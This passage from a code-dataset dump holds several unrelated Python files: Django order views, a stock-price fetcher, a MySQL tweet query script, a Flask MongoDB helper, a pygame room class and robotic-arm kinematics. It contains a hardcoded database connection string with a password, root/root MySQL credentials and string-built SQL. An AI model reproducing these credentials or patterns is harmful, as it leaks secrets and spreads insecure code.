len(resp_items), 'total_count': total_count}\n\n def post(self, req):
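\n \"\"\"Batch-ship orders. An uploaded 'excel_data' sheet is parsed with xlrd and shipped\n in bulk (with a shipping notification pushed per order); otherwise the JSON body must\n carry 'order_ids', and each of those orders is marked as sent.\"\"\"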
\n # batch ship from excel\n if 'excel_data' in req.FILES:\n data = req.FILES['excel_data']\n imported_data = []\n book = xlrd.open_workbook(file_contents=data.read())\n sh = book.sheet_by_index(0)\n for x in range(sh.nrows):\n imported_data.append(sh.row_values(x))\n shipp_push = db.batch_ship_orders(imported_data, req.user_id)\n for order_id, shipping_info in shipp_push:\n try:\n push_handler.push_shipping(order_id, shipping_info)\n except SmsPlatformError as e:\n _LOGGER.error('FAIL to send notify: %s', e)\n continue\n else:\n # batch autoship jd\n params = json.loads(req.body)\n check_params(params, ['order_ids'])\n for order_id in params['order_ids']:\n db.send_order(order_id)\n return {}\n\n @method_decorator(response_wrapper)\n @method_decorator(token_required)\n def dispatch(self, *args, **kwargs):\n return super(OrderView, self).dispatch(*args, **kwargs)\n\n\nclass SingleOrderView(TemplateView):\n\n def get(self, req, order_id):\n item = db.get_awarded_order(long(order_id))\n if item:\n data = item.as_dict()\n data['id'] = str(data.pop('order_id'))\n data['buyer'] = str(data.pop('user_id'))\n data['advise_delivery_time'] = 'No Delay'\n if data['status'] in (5, 11):\n gp_flag = redis_cache.get_gp_delivery_timestamp(data['buyer'])\n extend = json.loads(data['extend'])\n if gp_flag:\n award_time = extend.get('award_time')\n advise_delivery_time = datetime.datetime.strptime(award_time, '%Y-%m-%d %H:%M:%S') \\\n + datetime.timedelta(3)\n data['advise_delivery_time'] = advise_delivery_time.strftime('%Y-%m-%d %H:%M:%S')\n else:\n item = db.get_order(long(order_id))\n data = item.as_dict()\n data['id'] = str(data['id'])\n data['buyer'] = str(data['buyer'])\n\n activity = get_activity(data['activity_id'])\n buyer = get_account(data['buyer'])\n data['buyer_phone'] = buyer.phone if buyer else ''\n data['target_amount'] = activity.target_amount\n goods = get_goods(activity.goods_id)\n data['is_virtual'] = redis_cache.is_virtual_account(data['buyer'])\n data['activity_name'] = activity.name\n data['term_number'] = activity.term_number\n data['source'] = goods.source if goods else 'unknown'\n data['goods_price'] = goods.price if goods else 'unknown'\n return data\n\n def post(self, req, order_id):\n return self.put(req, order_id)\n\n def put(self, req, order_id):\n query_dct = json.loads(smart_unicode(req.body))\n shipping_push, receipt_push = db.update_order_info(\n int(order_id), query_dct, req.user_id)\n extend = query_dct['extend']\n try:\n extend = json.loads(extend)\n except ValueError as e:\n _LOGGER.error('order extend invalid value, %s' % e)\n if shipping_push and isinstance(extend, dict): # confirm shipment\n shipping_info = {\n 'express': extend.get('express'),\n 'express_num': extend.get('express_num')\n }\n if not shipping_info['express']:\n shipping_info = {}\n push_handler.push_shipping(order_id, shipping_info)\n if shipping_push and not isinstance(extend, dict): # confirm shipment\n push_handler.push_shipping(order_id, {})\n if receipt_push:\n push_handler.push_receipt(order_id)\n # create the show-order post\n order = db.get_order(order_id)\n show_order(order)\n\n _LOGGER.info('update order %s info: %s, user: %s', order_id,\n query_dct, req.user_id)\n return {}\n\n @method_decorator(response_wrapper)\n @method_decorator(token_required)\n def dispatch(self, *args, **kwargs):\n return super(SingleOrderView, self).dispatch(*args, **kwargs)\n","sub_path":"luckyadmin/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"457949747","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 27 18:18:50 2019\r\n\r\n@author: Ignacio Colino\r\n\"\"\"\r\nimport time\r\nimport pandas as pd\r\nimport requests\r\nimport os\r\n\r\n\"\"\"This module has the function to get the daily price data for different markets.\"\"\"
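\r\n# NOTE: requires an Alpha Vantage API key in the ALPHA_VANTAGE environment variable;\r\n# the free tier allows 5 requests per minute, hence the 13 s sleep between calls below.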
\r\n\r\n# Get the adjusted Data\r\ndef get_adjusted_data(market='ASX', num_stocks=None, tickers=None):\r\n \"\"\"This function returns a DataFrame with the historical daily price data\r\n for the corresponding market. The stock codes are picked up from the csv\r\n files in the folder.\"\"\"\r\n try:\r\n # Parameters for API request\r\n stock_list = {'ASX': '20180801-asx200.csv',\r\n 'SNP': '20180922_SP500_list.csv',\r\n 'CRY': 'digital_currency_list.CSV'}\r\n symbol_list = pd.read_csv(stock_list[market], header=1)\r\n names = ['open', 'high', 'low', 'close', 'adjusted_close', 'volume',\r\n 'dividend_amount', 'split_coefficient', 'symbol', 'date']\r\n cry_names_drop = ['1b. open (USD)', '2b. high (USD)',\r\n '3b. low (USD)', '4b. close (USD)']\r\n cry_names = ['open', 'high', 'low', 'close', 'volume', 'market_cap',\r\n 'symbol', 'date']\r\n data = pd.DataFrame(columns=['Symbol'])\r\n url = \"https://www.alphavantage.co/query?\"\r\n if tickers is not None:\r\n symbol_list = pd.DataFrame(tickers)\r\n if num_stocks is not None:\r\n symbol_list = symbol_list.sample(num_stocks)\r\n # Loop through stock list and concatenate\r\n for code in symbol_list.iloc[:, 0]:\r\n if code not in data['Symbol'].unique():\r\n # query structure\r\n para = {\"function\": \"TIME_SERIES_DAILY_ADJUSTED\",\r\n \"apikey\": os.getenv('ALPHA_VANTAGE')}\r\n if market == 'CRY':\r\n para['market'] = 'USD'\r\n para['function'] = 'DIGITAL_CURRENCY_DAILY'\r\n para[\"symbol\"] = code\r\n ts = 'Time Series (Digital Currency Daily)'\r\n sym = '2. Digital Currency Code'\r\n names = cry_names\r\n else:\r\n ts, sym = 'Time Series (Daily)', '2. Symbol'\r\n para[\"outputsize\"] = \"full\"\r\n para[\"symbol\"] = code\r\n page = requests.get(url, params=para)\r\n time.sleep(13) # 5 requests per minute allowed\r\n if ts in page.json():\r\n data2 = pd.DataFrame.from_dict(page.json()[ts],\r\n orient='index', dtype=float)\r\n data2['Symbol'] = page.json()['Meta Data'][sym]\r\n data2.index = pd.to_datetime(data2.index)\r\n data2.reset_index(level=0, inplace=True)\r\n data2['index'] = data2['index'].apply(lambda x: x.date())\r\n data = pd.concat([data, data2], axis=0, ignore_index=True,\r\n sort=True)\r\n\r\n # Print Summary and export to csv\r\n print(f'Tickers obtained = {data.Symbol.sort_values().unique()}')\r\n if market == 'CRY':\r\n data.drop(columns=cry_names_drop, inplace=True)\r\n data.rename(columns={i: j for i, j in zip(data.columns, names)},\r\n inplace=True)\r\n data['symbol'] = data['symbol'].astype('str')\r\n data['date'] = pd.to_datetime(data['date'])\r\n # data.to_csv(market+'_adjusted_data.csv', index=False)\r\n except Exception as error:\r\n print(error)\r\n finally:\r\n # if the api returns an error still return the fetched tickers\r\n return data\r\n\r\n\r\ndef main():\r\n return get_adjusted_data(market='SNP', num_stocks=3)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # pass\r\n main()\r\n","sub_path":"data_fetch.py","file_name":"data_fetch.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"371351893","text":"import pandas as pd\nfrom datetime import timedelta,datetime\nimport MySQLdb\n\n\ndf = pd.read_csv(\"jazminMeses.csv\", sep =\"|\")\ndf[\"Magnitud\"] = df[\"Magnitud\"].str[0:3].astype(\"float32\")\n\n\n#print(df.loc[ df[\"Magnitud\"] > 6.0])\n\ndf = df.loc[ df[\"Magnitud\"] > 5.0]\nprint(df)\n\ndates = []\nfor date_time in df[\"Fecha UTC\"]:\n\n date,time = 
tuple(date_time.split(\" \"))\n day, month, year = tuple(date.split(\"/\"))\n hour, minu, sec = tuple(time.split(\":\"))\n\n dt = datetime(int(year), int(month), int(day), int(hour), int(minu), int(sec))\n dates.append(dt)\n\ndf[\"Date UTF Python\"] = dates\n\n\nmonths = {}\nmonths[6] = \"junio\"\nmonths[7] = \"julio\"\nmonths[8] = \"agosto\"\n\n\n# connect\ndbdic = {}\nfor month in months:\n dbdic[month] = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"root\", db=months[month]+\"tweetschile\")\n\n\ndef tweetsByDateOfEarthQuakeInWindow(timewindow =30):\n tweetsByDateOfEarthQuakeInWindow = {}\n\n\n\n listDateUTF = df[\"Date UTF Python\"]\n for datetime_ini in listDateUTF:\n if(datetime_ini.month in months):\n DB_NAME = months[datetime_ini.month]+\"tweetschile\"\n tweetsByDateOfEarthQuakeInWindow[datetime_ini] = []\n\n datetime_fin = datetime_ini + timedelta(minutes=timewindow)\n query = 'select * from '+DB_NAME+'.'+datetime_ini.strftime('%Y%m%d')+'_tweets where creation_date>=\\''+datetime_ini.strftime('%Y/%m/%d %H:%M:%S')+'\\' and creation_date<=\\''+datetime_fin.strftime('%Y/%m/%d %H:%M:%S')+'\\';'\n\n cursor = dbdic[datetime_ini.month].cursor()\n cursor.execute(query)\n dbdic[datetime_ini.month].commit()\n\n numrows = int(cursor.rowcount)\n\n # get and display one row at a time.\n for x in range(0, numrows):\n row = cursor.fetchone()\n\n\n tweetsByDateOfEarthQuakeInWindow[datetime_ini].append(row[11].lower().split())\n\n return tweetsByDateOfEarthQuakeInWindow\n\n\ndef tweetsBeforeEarthQuakeInWindow(timewindow=30):\n tweetsBeforeEarthQuakeInWindow = {}\n\n listDateUTF = df[\"Date UTF Python\"]\n for datetime_fin1 in listDateUTF:\n datetime_fin = datetime_fin1 - timedelta(seconds=1)\n if (datetime_fin.month in months):\n DB_NAME = months[datetime_fin.month] + \"tweetschile\"\n tweetsBeforeEarthQuakeInWindow[datetime_fin1] = []\n\n datetime_ini = datetime_fin - timedelta(minutes=timewindow)\n query = 'select * from ' + DB_NAME + '.' + datetime_ini.strftime(\n '%Y%m%d') + '_tweets where creation_date>=\\'' + datetime_ini.strftime(\n '%Y/%m/%d %H:%M:%S') + '\\' and creation_date<=\\'' + datetime_fin.strftime('%Y/%m/%d %H:%M:%S') + '\\';'\n\n cursor = dbdic[datetime_ini.month].cursor()\n cursor.execute(query)\n dbdic[datetime_ini.month].commit()\n\n numrows = int(cursor.rowcount)\n\n # get and display one row at a time.\n for x in range(0, numrows):\n row = cursor.fetchone()\n\n tweetsBeforeEarthQuakeInWindow[datetime_fin1].append(row[11].lower().split())\n\n return tweetsBeforeEarthQuakeInWindow\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\n\n tweetsBeforeEarthQuakeInWindow = tweetsBeforeEarthQuakeInWindow()\n l = list(tweetsBeforeEarthQuakeInWindow.items())\n print(len(l[0][1]))\n print(len(l[1][1]))\n print(len(l[2][1]))\n print(len(l[3][1]))\n\n","sub_path":"pack1/chargeData.py","file_name":"chargeData.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"443228737","text":"# The routes are the different URLs that the application implements. In Flask, handlers for the application routes are\n# written as Python functions, called view functions. 
View functions are mapped to one or more route URLs so that Flask\n# knows what logic to execute when a client requests a given URL.\nimport click\nfrom flask import current_app, g\nfrom flask_pymongo import PyMongo\nfrom flask.cli import with_appcontext\nfrom app import app\n\n\ndef get_db():\n if 'db' not in g:\n app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n app.config['SECRET_KEY'] = 'dev'\n app.config['MONGO_DBNAME'] = 'slither'\n app.config[\n 'MONGO_URI'] = \"mongodb+srv://root:SAdmin1@mongo-dev-db-0e9wb.mongodb.net/slither?retryWrites=true&w=majority\"\n\n mongo = PyMongo(app)\n g.db = mongo\n return g.db\n\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n # the flask_pymongo wrapper has no close(); close the underlying MongoClient instead\n db.cx.close()\n\n\ndef init_db():\n # NOTE: leftover from the Flask/SQLite tutorial this module was adapted from;\n # PyMongo has no executescript(), so invoking this against MongoDB will fail.\n db = get_db()\n\n with current_app.open_resource('schema.sql') as f:\n db.executescript(f.read().decode('utf8'))\n\n\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n init_db()\n click.echo('Initialized the database.')\n\n\ndef init_app(app):\n app.teardown_appcontext(close_db)\n app.cli.add_command(init_db_command)\n","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536629639","text":"import pygame\nimport xml.etree.ElementTree as ET\nimport os\nimport random\n\nimport Config as cfg\nfrom objects.Door import Door\n\nUP = (0, -1)\nDOWN = (0, 1)\nLEFT = (-1, 0)\nRIGHT = (1, 0)\n\nclass Room:\n \"\"\"This class contains all settings related to a room in the dungeon.\n\n \"\"\"\n def __init__(self, game, doors, type_='default'):\n \"\"\"__init__ method for Room class\n\n Args:\n game (Integrate.Game): Integrate.Game class object.\n doors (str): Which doors are available (NSWE). Possible values: combination of N,S,E and W\n 
Possible values (start or default)\n\n \"\"\"\n self.game = game\n self.doors = doors\n self.type = type_\n self.w = cfg.WIDTH // cfg.TILESIZE\n self.h = (cfg.HEIGHT - cfg.GUI_HEIGHT) // cfg.TILESIZE\n \n self.visited = False\n self.pos = [0, 0] # initializing position with [0,0]\n self.dist = -1 # initializing distance with -1\n self.shut_doors_sprites = [] # a list of sprites that represent the closed doors\n self.cleared = False # boolean for if the player has done all the tasks in a room\n self.is_doors_shut = False\n self.object_data = []\n\n self.TM_POOL = self.randomize_rooms_tmx()\n # choose a random tmx file for this room\n if self.type == 'start': self.tm_file = 'room_0.tmx'\n else: self.tm_file = 'room_{}.tmx'.format(self.TM_POOL.pop())\n \n self.build()\n\n\n def randomize_rooms_tmx(self):\n \"\"\"Room class method for choosing random tmx file for each room.\n \n \"\"\"\n TM_POOL = []\n for i in range(cfg.DUNGEON_SIZE[0] * cfg.DUNGEON_SIZE[1]):\n TM_POOL.append(random.choice(cfg.TILEMAP_FILES))\n\n return TM_POOL\n\n def is_doors_equal(self, doors_1, doors_2):\n \"\"\"Room class method for comparing doors.\n \n Args:\n doors_1 (str): doors, possible values are a combination of N,W,E and S.\n doors_2 (Str): doors, possible values are a combination of N,W,E and S.\n\n Returns:\n doors_equal (bool): True if equal doors, False otherwise.\n\n \"\"\"\n doors_equal = True\n if len(doors_1) != len(doors_2):\n doors_equal = False\n \n doors_temp_1 = doors_1\n doors_temp_2 = doors_2\n for doors in doors_1:\n if doors not in doors_temp_2:\n doors_equal = False\n else:\n doors_temp_2 = doors_temp_2.replace(doors, '', 1)\n\n for doors in doors_2:\n if doors not in doors_temp_1:\n doors_equal = False\n else:\n doors_temp_1 = doors_temp_1.replace(doors, '', 1)\n \n return doors_equal\n\n def build(self): \n \"\"\"Room class method for building room.\n \n \"\"\"\n for doors in self.game.imageLoader.room_image_dict:\n if self.is_doors_equal(self.doors, doors) == True:\n self.image = self.game.imageLoader.room_image_dict[doors] \n self.tile_or_wall_doors()\n\n def tileset_from_tmx(self, filename):\n \"\"\"Room class method for extracting tileset from tmx file.\n \n Args:\n filename (str): filename of the tmx file.\n\n \"\"\"\n # reading xml\n file = os.path.join(cfg.ROOM_FOLDER, filename)\n tree = ET.parse(file)\n root = tree.getroot()\n \n # get tile data from csv node\n data = root[1][0].text\n data = data.replace(' ', '')\n data = data.strip('\\n') \n data = data.split('\\n')\n \n tile_array = [line.strip(',').split(',') for line in data]\n \n for i in range(len(tile_array)):\n for j in range(len(tile_array[i])):\n tile_array[i][j] = int(tile_array[i][j]) - 1\n\n return tile_array \n\n def objects_from_tmx(self, filename):\n \"\"\"Room class method for extracting tileset from tmx file.\n \n Args:\n filename (str): filename of the tmx file.\n\n \"\"\"\n file = os.path.join(cfg.ROOM_FOLDER, filename)\n tree = ET.parse(file)\n root = tree.getroot()\n \n raw_objects = root.iter('object')\n objects = []\n\n for obj in raw_objects:\n a = {}\n for key, value in obj.attrib.items():\n try:\n a[key] = float(value)\n except ValueError:\n a[key] = value\n child = obj.iter()\n for node in child:\n na = node.attrib\n if na.get('name') and na.get('name') not in a.keys():\n if na.get('value') is not None:\n a[na['name']] = float(na.get('value'))\n objects.append(a)\n \n return objects\n\n\n def tile_or_wall_doors(self):\n \"\"\"Room class method for tiling for doors present and walling for not present.\n \n 
\"\"\"\n # door position is in middle of the walls\n door_x = self.w // 2\n door_y = self.h // 2\n\n # read tileset and object data from files\n self.tiles = self.tileset_from_tmx(self.tm_file)\n self.layout = self.objects_from_tmx(self.tm_file)\n \n # setting tiles for doors that are present in the room\n if 'N' in self.doors:\n for i in range(8,12):\n self.tiles[0][i] = 1\n \n if 'S' in self.doors:\n for i in range(door_x-2, door_x+2):\n self.tiles[self.h - 1][i] = 1\n \n if 'W' in self.doors:\n for i in range(door_y-1, door_y+2):\n self.tiles[i][0] = 1\n \n if 'E' in self.doors:\n for i in range(door_y-1, door_y+2):\n self.tiles[i][self.w - 1] = 1\n\n # setting Wall for doors that are not present in the room\n if 'N' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 360, 'y': 3.1, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 400, 'y': 3.1, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 440, 'y': 3.1, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 320, 'y': 3.1, 'width': 40, 'height': 40})\n \n if 'S' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 360, 'y': 558, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 400, 'y': 558, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 440, 'y': 558, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 320, 'y': 558, 'width': 40, 'height': 40})\n \n if 'W' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 3, 'y': 240, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 3, 'y': 280, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 3, 'y': 320, 'width': 40, 'height': 40})\n \n if 'E' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 758, 'y': 240, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 758, 'y': 280, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 758, 'y': 320, 'width': 40, 'height': 40})\n\n def open_doors(self):\n \"\"\"Room class method for opening up doors by deleting the door sprites.\n \n \"\"\"\n if self.is_doors_shut:\n for d in self.shut_doors_sprites:\n d.kill()\n self.is_doors_shut = False\n\n def append_door_sprite(self, door):\n \"\"\"Room class method for placing the door sprite.\n \n Args:\n door (char): the current door character, possible values are N, S, E and W.\n\n \"\"\"\n door_pos = (cfg.DOOR_POSITIONS[door][0], cfg.DOOR_POSITIONS[door][1] + cfg.GUI_HEIGHT)\n door_sprite = Door(self.game, door_pos, direction=door)\n self.shut_doors_sprites.append(door_sprite)\n \n def shut_doors(self):\n \"\"\"Room class method for closing doors placing door sprites.\n \n \"\"\"\n if self.is_doors_shut == False:\n for door in self.doors:\n if self.type == 'start':\n door_pos = (cfg.DOOR_POSITIONS[door][0], cfg.DOOR_POSITIONS[door][1] + cfg.GUI_HEIGHT)\n d = Door(self.game, door_pos, direction=door)\n self.shut_doors_sprites.append(d)\n else:\n if self.game.dircheck == UP or self.game.dircheck == RIGHT or self.game.dircheck == LEFT or self.game.dircheck == DOWN:\n if 'N' in self.doors:\n self.append_door_sprite('N')\n if 'E' in self.doors:\n self.append_door_sprite('E')\n if 'W' in self.doors:\n self.append_door_sprite('W')\n if 'S' in self.doors:\n self.append_door_sprite('S')\n \n \n self.is_doors_shut = True\n \n 
\n","sub_path":"Room.py","file_name":"Room.py","file_ext":"py","file_size_in_byte":9443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"419804216","text":"from sklearn.linear_model import LinearRegression\nimport scipy.ndimage as ndi\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nseed = np.array(plt.imread('stealie.jpeg'))\nWidth = seed.shape[0]\nHeight = seed.shape[1]\n\n# seed = ndi.gaussian_laplace(seed,sigma=1)\n\n# generate random numpy array of the size 10,3\nX_train = seed[:,:,0]\ny_train = seed[:,:,0]\nX_test = np.random.random((Width,Height))\n\n# define the regression\nclf = LinearRegression()\n\n# fit & predict (predict returns numpy array of the same dimensions)\nclf.fit(X_train, y_train)\ny_pred = clf.predict(seed[:,:,0] - np.random.random_integers(0,255,Width*Height).reshape((Width,Height)))\n\nf, ax = plt.subplots(1, 2)\nax[0].imshow(y_train)\nax[1].imshow(y_pred)\nplt.show()","sub_path":"Art/2D/G3N/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"556338504","text":"from bson import ObjectId\r\nfrom pymongo import MongoClient, ReturnDocument\r\nfrom pymongo.collection import Collection\r\n\r\nfrom config.env import MONGODB\r\n\r\n_mongo_pools = {}\r\n\r\n\r\ndef get_mongo_pool(alias):\r\n if alias not in _mongo_pools:\r\n params = MONGODB[alias]\r\n name = params.pop(\"name\")\r\n auth = params.pop(\"auth\", None)\r\n params[\"connect\"] = False\r\n _mongo_pools[alias] = MongoClient(**params)[name]\r\n if auth:\r\n _mongo_pools[alias].authenticate(**auth)\r\n return _mongo_pools[alias]\r\n\r\n\r\nclass ModelException(Exception):\r\n pass\r\n\r\n\r\nclass MongoModel(Collection):\r\n _fields = None\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n\r\n def create(self, doc_or_docs):\r\n \"\"\"插入文档\r\n 相比于MongoDB原生的insert,增加了none值字段过滤和模型字段验证。\r\n\r\n :Parameters:\r\n - `doc_or_docs`: ``dict`` or ``list``,单个文档或文档列表\r\n\r\n :Returns:\r\n - 同原生insert接口\r\n \"\"\"\r\n if isinstance(doc_or_docs, dict):\r\n self._filter_none_value(doc_or_docs)\r\n self._validate(doc_or_docs)\r\n ret = super().insert_one(doc_or_docs)\r\n return ret.inserted_id\r\n elif isinstance(doc_or_docs, list):\r\n for v in doc_or_docs:\r\n self._filter_none_value(v)\r\n self._validate(v)\r\n ret = super().insert_many(doc_or_docs)\r\n return ret.inserted_ids\r\n\r\n def modify(\r\n self,\r\n spec,\r\n document,\r\n multi=False,\r\n upsert=False,\r\n validate=True,\r\n sort=None,\r\n return_document=None,\r\n unset_empty=True,\r\n ):\r\n \"\"\"部分更新文档\r\n 只更新置顶字段的值,如果值为空字符串则表示删除该字段,未指定的字段值保持不变\r\n\r\n :Parameters:\r\n - `spec`: ``dict``,更新条件\r\n - `document`: ``dict``,要更新的字段和值,如果字段值为\"\",则删除该字段,\r\n 字段值为None或不在document里的字段保持不变\r\n - `multi`: ``bool``,更新所有匹配文档还是仅第一个\r\n - `upsert`: ``bool``,没有匹配文档时是否插入\r\n - `validate`: ``bool``,是否验证文档合法性\r\n - `sort`: ``list``,multi为False,更新按此顺序匹配的第一个\r\n - `return_document`: ``ReturnDocument``,multi为False时,是否返回更新前或更新后的文档\r\n\r\n :Returns:\r\n - 更新的文档个数\r\n \"\"\"\r\n self._filter_none_value(document)\r\n if unset_empty:\r\n set_fields = {k: v for k, v in document.items() if v != \"\"}\r\n unset_fields = {k: v for k, v in document.items() if v == \"\"}\r\n else:\r\n set_fields = {k: v for k, v in document.items()}\r\n unset_fields = {}\r\n if validate:\r\n self._validate(set_fields, False)\r\n\r\n doc = {}\r\n if set_fields:\r\n doc[\"$set\"] = 
set_fields\r\n if unset_fields:\r\n doc[\"$unset\"] = unset_fields\r\n if not doc:\r\n if (\r\n return_document == ReturnDocument.AFTER\r\n or return_document == ReturnDocument.BEFORE\r\n ):\r\n return self.find_one(spec)\r\n else:\r\n return 0\r\n if multi:\r\n ret = super().update_many(spec, doc, upsert=upsert)\r\n return ret.modified_count\r\n else:\r\n if return_document is None:\r\n ret = super().update_one(spec, doc, upsert=upsert)\r\n return ret.modified_count\r\n else:\r\n return super().find_one_and_update(\r\n spec, doc, sort=sort, return_document=return_document\r\n )\r\n\r\n def find_by_ids(self, ids, keep_order=True):\r\n if not ids:\r\n return []\r\n\r\n docs = list(self.find({\"_id\": {\"$in\": ids}}))\r\n\r\n if keep_order:\r\n d = {v[\"_id\"]: v for v in docs}\r\n docs = [d.get(v) for v in ids]\r\n\r\n return docs\r\n\r\n @staticmethod\r\n def _filter_none_value(doc):\r\n if not isinstance(doc, dict):\r\n raise ModelException(\"doc should be a dict\")\r\n\r\n for k, v in list(doc.items()):\r\n if v is None:\r\n del doc[k]\r\n\r\n return doc\r\n\r\n @classmethod\r\n def _validate(cls, doc, required=True):\r\n if cls._fields is None:\r\n return\r\n\r\n for k, v in doc.items():\r\n if \".\" in k:\r\n continue\r\n\r\n if k not in cls._fields:\r\n raise ModelException(\"unexpected field '{}'\".format(k))\r\n\r\n type_, _ = cls._fields[k]\r\n if type_ is not None and not isinstance(v, type_):\r\n raise ModelException(\"field '{}' should be a '{}'\".format(k, type_))\r\n\r\n if required:\r\n fields = [k for k, v in cls._fields.items() if v[1]]\r\n for v in fields:\r\n if v not in doc:\r\n raise ModelException(\"field '{}' is required\".format(v))\r\n\r\n @classmethod\r\n def contains(cls, key):\r\n if cls._fields:\r\n return key in cls._fields\r\n return False\r\n\r\n @classmethod\r\n def field_keys(cls):\r\n if cls._fields:\r\n return cls._fields.keys()\r\n return set()\r\n","sub_path":"src/common/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"107344561","text":"#!/usr/bin/env python3\n\nfrom math import *\nimport numpy as np\n\nclass RoboticArm:\n def __init__(self):\n self.__l1 = 69.0\n self.__l2 = 80.0\n self.__l3 = 120.0\n self.__l4 = 57.94\n self.__l5 = 70\n\n self.__convertionAngleFor1 = 0\n self.__convertionAngleFor2 = -pi/2\n self.__convertionAngleFor3 = pi\n self.__convertionAngleFor4 = pi/2\n self.__convertionAngleFor5 = 0\n\n self.__joint_1_l = -3.14\n self.__joint_1_u = 3.14\n self.__joint_2_l = -2.6\n self.__joint_2_u = 2.6\n self.__joint_3_l = -2.6\n self.__joint_3_u = 2.6\n self.__joint_4_l = -1.60\n self.__joint_4_u = 1.60\n self.__joint_5_l = -2.60\n self.__joint_5_u = 2.60\n\n def DirectProblem(self,q1,q2,q3,q4,q5):\n\n l1 = self.__l1\n l2 = self.__l2\n l3 = self.__l3\n l4 = self.__l4\n l5 = self.__l5\n q1 = q1 - self.__convertionAngleFor1\n q2 = q2 - self.__convertionAngleFor2\n q3 = q3 - self.__convertionAngleFor3\n q4 = -q4 - self.__convertionAngleFor4\n q5 = q5 - self.__convertionAngleFor5\n\n # a1 = np.array([[cos(q1),0,sin(q1),0],\n # [sin(q1),0,-cos(q1),0],\n # [0,1,0,l1],\n # [0,0,0,1]])\n # a2 = np.array([[cos(q2),-sin(q2),0,l2*cos(q2)],\n # [sin(q2),cos(q2),0,l2*sin(q2)],\n # [0,0,1,0],\n # [0,0,0,1]])\n # a3 = np.array([[cos(q3),sin(q3),0,-l3*cos(q3)],\n # [sin(q3),-cos(q3),0,-l3*sin(q3)],\n # [0,0,-1,0],\n # [0,0,0,1]])\n # a4 = np.array([[cos(q4),0,sin(q4),0],\n # [sin(q4),0,-cos(q4),0],\n # [0,1,0,0],\n # 
[0,0,0,1]])\n # a5 = np.array([[cos(q5),-sin(q5),0,0],\n # [sin(q5),cos(q5),0,0],\n # [0,0,1,l4+l5],\n # [0,0,0,1]])\n\n # a1a2 = np.dot(a1,a2)\n # a1a2a3 = np.dot(a1a2,a3)\n # a1a2a3a4 = np.dot(a1a2a3,a4)\n # tT = np.dot(a1a2a3a4,a5)\n\n tT = np.array([[cos(q5)*(cos(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2))) - sin(q1)*sin(q5), -cos(q5)*sin(q1) - sin(q5)*(cos(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2))), -cos(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2)) + sin(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)), -cos(q1)*cos(q2)*cos(q3)*l3 + cos(q1)*cos(q2)*l2 + cos(q1)*l3*sin(q2)*sin(q3) + (l4 + l5)*(-cos(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2)) + sin(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)))],\n [cos(q1)*sin(q5) + cos(q5)*(cos(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2))), cos(q1)*cos(q5) - sin(q5)*(cos(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2))), -cos(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2)) + sin(q4)*(cos(q2)*cos(q3)*sin(q1) - 